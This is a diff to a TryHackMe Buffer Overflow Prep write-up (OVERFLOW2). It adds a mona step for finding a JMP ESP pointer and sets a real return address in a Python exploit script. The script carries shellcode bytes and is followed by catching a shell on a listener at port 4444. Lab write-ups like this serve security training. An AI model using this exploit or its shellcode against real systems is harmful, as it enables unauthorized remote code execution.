--- a/TryHackMe/Buffer_Overflow_Prep/2.md
+++ b/TryHackMe/Buffer_Overflow_Prep/2.md
@@ -286,7 +286,17 @@ I verify that all my C's show up
 ![image](https://user-images.githubusercontent.com/83407557/185278708-6487c3d7-53aa-4d04-b7e6-64de66e2dafb.png)
 
 
-With this I can create the final exploit.py
+# Finding a jump point
+
+To find an address that will jump me into ESP (where my shellcode will reside) in mona I use the command:
+`!mona jmp -r esp -cpb "\x00\x23\x3c\x83\xba"`
+
+This gives me 9 possible pointers
+
+![image](https://user-images.githubusercontent.com/83407557/185279805-ebc502df-20e6-4882-88d6-13ee5f46f584.png)
+
+
+With this I can pick a pointer and create the final exploit.py
 
 ```python
 #!/usr/bin/env python3
@@ -298,7 +308,7 @@ port = 1337
 prefix = "OVERFLOW2 "
 offset = 634
 overflow = "A" * offset
-retn = "BBBB"
+retn = "\xaf\x11\x50\x62"
 padding = "\x90" * 16
 payload = ("\xfc\xbb\xe1\x4c\x96\x35\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3"
 "\x85\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\x1d\xa4\x14\x35\xdd"
@@ -341,4 +351,6 @@ except:
 ```
 
 I reset the application on the target, start a listener on port 4444 from kali and execute exploit.py
+
+![image](https://user-images.githubusercontent.com/83407557/185280177-b1d4a7c5-4f3e-40eb-ba6b-ac7276b8dc0b.png)
 
